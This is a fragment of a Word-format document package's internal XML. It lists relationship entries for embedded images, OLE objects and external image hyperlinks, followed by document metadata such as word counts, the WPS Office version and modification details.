Target="media/image115.jpeg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpeg"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.emf"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpeg"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.emf"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.emf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.emf"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpeg"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpeg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106165421167.png" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106165440154.png" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230109150739909.png" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164831182.png" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164743194.png" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164711413.png" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164633833.png" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164520715.png" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164421580.png" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230109150418307.png" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106170933578.png" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164245476.png" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164202327.png" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106164026340.png" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cw-medium.oss-cn-huhehaote.aliyuncs.com/Image/ZSTX/78/005/image-20230106163836193.png" TargetMode="Externa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89</Pages>
  <Words>9554</Words>
  <Characters>20625</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>14</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22785</CharactersWithSpaces>
  <Application>WPS Office_12.1.0.15324_F1E327BC-269C-435d-A152-05C5408002CA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宋佳兴</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-13T07:39:42Z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2052-12.1.0.15324</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>591AC20F279C43C79E7D3F76528C5438_12</vt:lpwstr>
  </property>
</Properties>
</file>